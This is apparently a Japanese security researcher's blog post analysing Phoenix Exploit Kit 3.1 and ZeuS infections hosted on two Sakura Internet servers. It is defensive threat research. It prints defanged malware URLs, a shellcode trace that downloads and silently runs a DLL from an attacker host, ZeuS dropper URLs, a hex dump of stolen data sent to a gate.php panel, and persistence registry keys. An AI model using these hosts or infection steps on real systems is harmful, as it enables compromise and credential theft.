今回の発見はまたZeuSマルウェアの感染部品を発見し、「PHOENIX EXPLOIT KITバーション3.1」に感染された2つウェブサイトをの事件です。まったく同じ感染部品だし、同じ居データセンター(SAKURA/IDC)ですから、別々の事件レポートを書くのは面倒くさいなので、纏めて書きました。出来る限り「PHOENIX EXPLOIT KITバーション3.1」の説明をさせて頂きます。
さて、レポートは下記となります↓
----■下記の2件のウェブサーバ/IPアドレス↓
112.78.124.115 219.94.194.138■下記のURL↓
hxxp://112.78.124.115:8080/navigator/clxsimbrinel.pdf hxxp://219.94.194.138:8080/navigator/clxsimbrinel.pdf hxxp://219.94.194.138:8080/navigator/frf3.php hxxp://112.78.124.115:8080/navigator/frf3.php■ダウンロード証拠↓
--14:52:42-- hxxp://112.78.124.115:8080/navigator/clxsimbrinel.pdf => `clxsimbrinel.pdf' Connecting to 112.78.124.115:8080... connected. hxxp request sent, awaiting response... 200 OK Length: 13,235 (13K) [application/pdf] 100%[====================================>] 13,235 46.50K/s 14:52:43 (46.35 KB/s) - `clxsimbrinel.pdf' saved [13235/13235] --14:59:39-- hxxp://219.94.194.138:8080/navigator/clxsimbrinel.pdf => `clxsimbrinel.pdf.1' Connecting to 219.94.194.138:8080... connected. hxxp request sent, awaiting response... 200 OK Length: 13,235 (13K) [application/pdf] 100%[====================================>] 13,235 --.--K/s 14:59:40 (164.89 MB/s) - `clxsimbrinel.pdf.1' saved [13235/13235] --15:08:14-- hxxp://219.94.194.138:8080/navigator/frf3.php => `frf3.php' Connecting to 219.94.194.138:8080... connected. hxxp request sent, awaiting response... 200 OK Length: 147,496 (144K) [application/octet-stream] 100%[====================================>] 147,496 118.24K/s 15:08:16 (118.14 KB/s) - `frf3.php' saved [147496/147496] --15:09:01-- hxxp://112.78.124.115:8080/navigator/frf3.php => `frf3.php.1' Connecting to 112.78.124.115:8080... connected. hxxp request sent, awaiting response... 200 OK Length: 147,496 (144K) [application/octet-stream] 100%[====================================>] 147,496 100.06K/s 15:09:03 (99.96 KB/s) - `frf3.php.1' saved [147496/147496]■ファイルの形はこんな感じ↓
-rwx------ 1 13235 Apr 8 08:37 clxsimbrinel.pdf -rwx------ 1 147496 Apr 9 21:08 frf3.php frf3.php 65ac9035d47dfcb632a24a95098090b6 clxsimbrinel.pdf 0e24d38adc791529565afe905d60b733 アイコン↓ ※PDFファイルはそのままですが、中身はマルウェアコードされたJavaScriptを発見しました。 ※FRF3.PHPファイルはWindowsの実行バイナリーです。■ウイルススキャン結果↓
File name: clxsimbrinel.pdf MD5: 0e24d38adc791529565afe905d60b733 File size: 12.9 KB ( 13235 bytes ) File type: PDF Detection ratio: 30 / 42 Analysis date: 2012-04-10 06:21:55 UTC Result: [CLICK]File name: frf3.php MD5: 65ac9035d47dfcb632a24a95098090b6 File size: 144.0 KB ( 147496 bytes ) File type: Win32 EXE Detection ratio: 7 / 42 Analysis date: 2012-04-10 06:20:59 UTC Result: [CLICK]■マルウェア種類
アファイル :「○○.pdf」 マルウェア種類: Phoenix Exploit PackのJavaScript Trojan REDIRECTOR (ZeuS感染仕組み) マルウェア名 : PDF/Exploit、PDF/JS.Redir、PDF/Trojan.JS.Agent など マルウェア機能: マルウェアサイトのJavascriptをダウンロードと実行される 説明 : PHOENIX EXPLOIT PACKから感染されたURLのPDF感染ファイル クリックしてしまうとマルウェアサイトへ飛ばされて、 マルウェアがダウンロードされます アファイル :「○○.php」 マルウェア種類: Phoenix Exploit PackのZeusトロイダウンローダー マルウェア名 : Trojan.Win32.Generic、Trojan.Downloader など マルウェア機能: マルウェアファイルをダウンロードされます 説明 : PHOENIX EXPLOIT PACKのダウンロードサイトからの マルウェアをダウンロードされる マルウェアサイトに接続動きを発見、データ送信も発見■マルウェア調査 本件の感染事件はPHOENIX EXPLOIT V3.1から感染ですので、少しPHOENIX EXPLOIT KITを説明します。 丁度友達研究者がPHOENIX EXPLOIT KITに感染されたサイトのスナップショットがあるからそこから説明始まります。 PHOENIX EXPLOIT V3.1の説明
ログイン画面はこんな感じです↓ (Credit: Xylit0l/Xylibox) EXPLOIT機能データベースの中に本件のマルウェアPDFが使っているEXPLOIT情報が入っています↓ (Credit: Xylit0l/Xylibox) 日本の感染されたウェブサイトの情報↓ (Credit: Xylit0l/Xylibox)このEXPLOIT PACKにハッキングされたサイトは下記のファイルセットを発見が出来ます↓
(Credit: snowfl0w/Contagio) ↑本件の発見は上記の画像でマークしたPDFファイルです。全世界にはPHOENIXからの感染が一昨日から急に超えてしまいましたので、 ブラックリストにはこのぐらいに発見しました↓
※本件の発見は登録しました。パターンは同じなので、ポート8080の後はPHP、JAR、EXEのファイルが入っています。今回のPHOENIX EXPLOIT PACK感染仕組み的には下記となります↓
↑始まりは間違いなく同じでスパムメールからです、 blackholeと違う所はPHOENIXではjarとpdfファイルを使えます(選択で出来そうです)■Exploit Packのマルウェアファイルの調査 1. clxsimbrinel.pdf OR nantokakantoka.PDF
本PDFの下記の所にjavascriptを発見しました。 ↑obfuscatedのスクリプトですね。e v a lのバリューを確認したら下記のように出ました↓ ↑ 色んな方法を試してみたら下記のSHELLCODEが出ました↓ ↑ 見辛いので、ASCIIで見ようと、URLが過ぎに発見しました、今回は難しくないですね(^^↓ ↑気にしている方々の為に自分の使っているツールのsナップショット画像↓ このSHELLCODEの調査が必要ですね。 よく見たらCVE-2010-0188のADOBE脆弱性PoCのコードが入っています。 ウイルススキャンしたらこの結果が出ます→【CLICK】←既に検知が出来ている物です(AVのパターンDBに登録された) 行動分析調査したらこのDLLファイルを使っています→kernel32.dllとurlmon.dll 脆弱性を起こしたら、マルウェアの動き始まりますので、下記の順番↓0x7c801ad9 DLL:kernel32 CALL:VirtualProtect lpAddress=0x402202, dwSize=255 0x7c801d7b DLL:kernel32 CALL:LoadLibraryA lpFileName=urlmon(stack to CALL DLL) 0x7c835dfa DLL:kernel32 CALL:GetTempPathA lpBuffer=0x22fa60, nBufferLength=248, (VAR INITIATION) lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\] (STRING ALLOC) 0x1a494bbe DLL:urlmon CALL:URLDownloadToFileA pCaller=0, szURL=hxxp://engineofsovjets.su:8080/navigator/frf3.php?i=8, lpfnCB=0x0, szFileName=C://DOCUME~1\Administrator\LOCALS~1//Temp\wpbt0.dll 0x7c86250d DLL:kernel32 CALL:WinExec lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0 0x7c86250d DLL:kernel32 CALL:WinExec lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll uCmdShow=0 0x7c81cb3b DLL:kernel32 CALL:TerminateThread : dwExitCode=0↑ようするに下記の意味合いです↓
1. hxxp://engineofsovjets.su:8080/navigator/frf3.php?i=8からのURLをダウンロード 2. C://DOCUME~1\Administrator\LOCALS~1//Temp\wpbt0.dllへ保存 3. 保存したファイルをそのままでSILENTで実行 4. さらにWindowsのレジストリーに登録、で終了。2. frf3.php OR wpbt0.dll
このファイルを実行されたら下記の動きを発見しました↓ 保存されたファイル↓%Temp%\oid.bat %CurrentDir%\wpbt0.dllレジストリーの変更点↓
HKEY_CURRENT_USER\Software\WinRAR → HWID = 7B 37 41 32 35 46 34 30 44 2D 33 34 41 42 2D 34 46 34 36 2D 42 33 45 46 2D 41 46 39 35 44 34 41 38 32 42 33 38 7Dネットワーク動きは↓
DNS依頼↓※↑ダウンロードが出来たらこのやり取りを発見しました!www.alberghi.com buyandsmile.atomclick.co contabilidadesr.com.br www.vandenboschelektro.be geovanabauerdocesfinos.com.brダウンロード依頼↓
hxxp://contabilidadesr.com.br/1mmF86V8/Vdqu.exe hxxp://www.vandenboschelektro.be/vgwCwvDs/Y9fNYJCs.exe hxxp://geovanabauerdocesfinos.com.br/6md3zev5/hQj.exeバックドアー動き↓
www.alberghi.com TCP/8080送信された情報↓
00000000 | 504F 5354 202F 706F 6E79 2F67 6174 652E | POST /pony/gate. 00000010 | 7068 7020 4854 5450 2F31 2E30 0D0A 486F | php HTTP/1.0..Ho 00000020 | 7374 3A20 7777 772E 616C 6265 7267 6869 | st: www.alberghi 00000030 | 2E63 6F6D 0D0A 4163 6365 7074 3A20 2A2F | .com..Accept: */ 00000040 | 2A0D 0A41 6363 6570 742D 456E 636F 6469 | *..Accept-Encodi 00000050 | 6E67 3A20 6964 656E 7469 7479 2C20 2A3B | ng: identity, *; 00000060 | 713D 300D 0A43 6F6E 7465 6E74 2D4C 656E | q=0..Content-Len 00000070 | 6774 683A 2031 3932 0D0A 436F 6E6E 6563 | gth: 192..Connec 00000080 | 7469 6F6E 3A20 636C 6F73 650D 0A43 6F6E | tion: close..Con 00000090 | 7465 6E74 2D54 7970 653A 2061 7070 6C69 | tent-Type: appli 000000A0 | 6361 7469 6F6E 2F6F 6374 6574 2D73 7472 | cation/octet-str 000000B0 | 6561 6D0D 0A43 6F6E 7465 6E74 2D45 6E63 | eam..Content-Enc 000000C0 | 6F64 696E 673A 2062 696E 6172 790D 0A55 | oding: binary..U 000000D0 | 7365 722D 4167 656E 743A 204D 6F7A 696C | ser-Agent: Mozil 000000E0 | 6C61 2F34 2E30 2028 636F 6D70 6174 6962 | la/4.0 (compatib 000000F0 | 6C65 3B20 4D53 4945 2035 2E30 3B20 5769 | le; MSIE 5.0; Wi 00000100 | 6E64 6F77 7320 3938 290D 0A0D 0A43 5259 | ndows 98)....CRY 00000110 | 5054 4544 3094 8E01 19A5 3F45 D2ED 2B1D | PTED0.....?E..+. 00000120 | AB40 58CA 51C0 C0AA 4DFF E41F A0D5 69D6 | .@X.Q...M.....i. 00000130 | 86B8 1866 7898 C311 9146 8568 375A 430F | ...fx....F.h7ZC. 00000140 | D4DC ED14 32F0 2E42 E8DC 2ADA B141 10C5 | ....2..B..*..A.. 00000150 | A541 60B8 B2C6 5B79 E3F5 A6BD CACA 9559 | .A`...[y.......Y 00000160 | E8EA 5CD1 0A23 8263 DC3C 48A7 D320 5C75 | ..\..#.c.<H.. \u 00000170 | 1482 5A44 CC20 5F4D 407A 7A27 E589 9BF6 | ..ZD. _M@zz'.... 00000180 | 37BE CA9F 909F C33C B144 F365 7126 C843 | 7......<.D.eq&.C 00000190 | 3811 AD7C 9D4F 0192 4B90 2AA6 C5DB 678D | 8..|.O..K.*...g. 000001A0 | 402A F780 7BCA 1082 CAE0 E25A D766 EC57 | @*..{......Z.f.W 000001B0 | BD1E 4383 09FD 2EA3 504F DBED 1CC7 5B4B | ..C.....PO....[K 000001C0 | 3314 199A F367 D84D 0E53 10F4 C8 | 3....g.M.S...↑よーく見たらあるPHOENIX EXPLOITサイトにあるGATE.PGPに情報を送信された。 そのファイルを確認したら下記の情報が出ました↓
$ cat gate.php STATUS-IMPORT-OK3. Vdqu.exe、Y9fNYJCs.exe、hQj.exe (ZeuS/ZBotトロイ) 上記のダウンロードURLをダウンロードしたら、全てダウンロードが出来ちゃいました↓
--16:20:32-- hxxp://contabilidadesr.com.br/1mmF86V8/Vdqu.exe => `Vdqu.exe' Resolving contabilidadesr.com.br... 187.45.210.78 Connecting to contabilidadesr.com.br|187.45.210.78|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 305,704 (299K) [application/octet-stream] 100%[====================================>] 305,704 64.51K/s ETA 00:00 16:20:38 (64.40 KB/s) - `Vdqu.exe' saved [305704/305704] --16:20:50-- hxxp://www.vandenboschelektro.be/vgwCwvDs/Y9fNYJCs.exe => `Y9fNYJCs.exe' Resolving www.vandenboschelektro.be... 195.130.132.84 Connecting to www.vandenboschelektro.be|195.130.132.84|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 305,704 (299K) [application/octet-stream] 100%[====================================>] 305,704 79.59K/s ETA 00:00 16:20:55 (79.41 KB/s) - `Y9fNYJCs.exe' saved [305704/305704] --16:21:09-- hxxp://geovanabauerdocesfinos.com.br/6md3zev5/hQj.exe => `hQj.exe' Resolving geovanabauerdocesfinos.com.br... 209.126.254.125 Connecting to geovanabauerdocesfinos.com.br|209.126.254.125|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 305,704 (299K) [application/x-executable] 100%[====================================>] 305,704 160.02K/s 16:21:12 (159.41 KB/s) - `hQj.exe' saved [305704/305704]見た目はこんな感じです↓
-rwx------ 1 305704 Apr 9 22:00 Vdqu.exe -rwx------ 1 305704 Apr 9 22:00 Y9fNYJCs.exe -rwx------ 1 305704 Apr 9 21:52 hQj.exe アイコン↓ ※)上記の3つファイルの見た目は同じです。ウイルススキャン結果↓
File name: などなど.exe (色んなランダム名前) MD5: 05409f83898aea65fda75a9a0b35eb8f File size: 298.5 KB ( 305704 bytes ) File type: Win32 EXE Detection ratio: 5 / 42 Analysis date: 2012-04-10 09:22:26 UTC Result: [CLICK]マルウェアの種類↓
アファイル :「○○.exe」 マルウェア種類: ZeuS/ZBotのトロイ・マルウェア マルウェア名 : Win32/Trojan/ZeuS, Kryptik, Zbot、などなど マルウェア機能: スパイウェア、キーロガー、ボットネット、ブラウザーやり取り情報を盗む 説明 : 感染されたPCにブラウザーのキーボードとログイン情報をリモートに送信される メモリーのスナップショットがリモートから取れる可能性がある。マルウェアファイル調査↓
1. TimeDateStamp: 0x4F83D7A4 [Tue Apr 10 06:48:04 2012 UTC] 2. CRC Fail, Claimed: 351095 Actual: 351094 3. Linker Info: 2.50 4. EP Section: .text (Entropy 7.72132137278) <== PACKED! 5. Fake Software Name: Length: 0x2EA ValueLength: 0x0 Type: 0x1 LangID: 040904B0 LegalCopyright: \xa9 Microsoft Corporation. All rights reserved. InternalName: DFDWiz.exe FileVersion: 6.1.7600.16385 (win7_rtm.090713-1255) CompanyName: Microsoft Corporation ProductName: Microsoft\xae Windows\xae Operating System ProductVersion: 6.1.7600.16385 FileDescription: Windows Disk Diagnostic User Resolver OriginalFilename: DFDWiz.exe 6. Suspicious Marks: 0x444de8 GetCurrentProcess //Antidebug 0x444ed0 IsDebuggerPresent 0x444f08 GetProcAddress 0x445068 LoadLibraryA 0x444c98 CreateFileA //Malware File Activities 0x444e2c SetFileAttributesA 0x444fe8 CreateProcessA 0x444ce8 VirtualAllocEx //System Hook 0x444e34 VirtualProtectEx 0x4451dc SetClipboardData //Clipboard hook 0x445144 GetKeyState //Keyboard Hook (keylogger) 0x445438 GetAsyncKeyState 0x444d3c VirtualAlloc //DEP violation 0x444d68 SetSystemTime //Privilage Escalation Traces 0x444e7c ReadProcessMemory 0x444f24 Process32Next //Process Enumeration call 7. Many oher suspicious calls in DLL list --> [HERE] 8. First bytes reversing to ASM is [HERE]■マルウェアの行動分析調査 下記のファイルを保存されました↓
%AppData%\Anzaas\modix.exe 0ef3c938fa0859414a2f0debfd714c5a 305,704 bytes %AppData%\obus.ehb 0d1c75f3690f07c4029da91f756fa503 1,322 bytes %Temp%\tmpafa30c81.bat 887cd36aa4a6f4a12336e3fbe10faae4 168 bytes■ドロップされたバイナリーの形は↓
File name: modix.exe MD5: 2378802f2bf2406908f3b3013edd8f47 File size: 298.5 KB ( 305704 bytes ) File type: Win32 EXE Detection ratio: 8 / 42 Analysis date: 2012-04-10 15:27:00 UTC Scan Result: [CLICK] ※ようするに、元のバイナリーと同じ形、ですが、MD5が違います。 マルウェアのPolymorphic(SIGNATURE変更)の技術を使っているそうですね。ZeuSの【注意】点!■下記の順番でプロセスが立ち上がりました↓
サンプル (MODIX.EXEにコピーしregistryに自動起動の登録して、プロセス終了) | +---modix.exe (ALIVE) | +---cmd.exe (ALIVE) | +---Explorer.exe (ALIVE)■レジストリーの変更を発見↓
//マルウェアUIDと登録 [HKEY_CURRENT_USER\Identities] Identity Login = 0x00098053 //Cookieクリーンアップ [HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Privacy] CleanCookies = 0x00000000 //ZeuSトロイマルウェア自動実行設定 [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] {3DFA1AE4-115C-AD7B-A6BA-A75086AF8442} = ""%AppData%\Anzaas\modix.exe"" //インターネットZoneをクリーンアップ [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0] 1609 = "" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1] 1406 = "" 1609 = "" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2] 1609 = "" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3] 1406 = "" 1609 = "" [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4] 1406 = "" 1609 = ""■キーロガー機能を発見↓
VK_LBUTTON (1) 18■下記のMUTEXを発見↓
Global\{370A7816-AFFD-2A8F-E811-5333C5ED7021} Global\{3BE6AF24-78CF-2663-E811-5333C5ED7021}■感染されたサーバの情報↓
inetnum: 219.94.128.0 - 219.94.255.255 netname: SAKURA-OSAKA descr: SAKURA Internet Inc. descr: 1-8-14, Minami Honmachi, Chuo-ku, Osaka 541-0054, Japan country: JP inetnum: 112.78.112.0 - 112.78.127.255 netname: SAKURA-OSAKA descr: SAKURA Internet Inc. descr: 1-8-14, Minami Honmachi, Chuo-ku, Osaka 541-0054, Japan country: JP 注意点:上記のIPに沢山.RUと.SUドメインが登録されています! 本件の感染は日本のSAKURAインターネットルート/「AS9371」です↓↓ a. [JPNICハンドル] KW419JP b. [氏名] 鷲北 賢 c. [Last, First] Washikita, Ken d. [電子メイル] north-nic@sakura.ad.jp f. [組織名] さくらインターネット株式会社 g. [Organization] SAKURA Internet Inc. k. [部署] 技術部 l. [Division] Technical Department m. [肩書] 部長 n. [Title] Director o. [電話番号] +81-6-6265-4830 p. [FAX番号] +81-6-6265-4834 y. [通知アドレス] jpnic-staff@sakura.ad.jp [最終更新] 2007/05/23 12:11:07(JST) db-staff@nic.ad.jp
ゼロデイ・ジャパン http://0day.jp
マルウェア研究所
Analyst: アドリアン・ヘンドリック / Hendrik ADRIAN
Sponsored by: 株式会社ケイエルジェイテック
Tweet
TO BE NOTICED: All of the findings and exposed material in this site is belong to the site owner and is an original
materials. Any COPY of research material without written permission from unixfreaxjp/site owner is strictly prohibited. Any attempt to camouflage and attempt to owning this research material will be prosecuted by law.
0 件のコメント:
コメントを投稿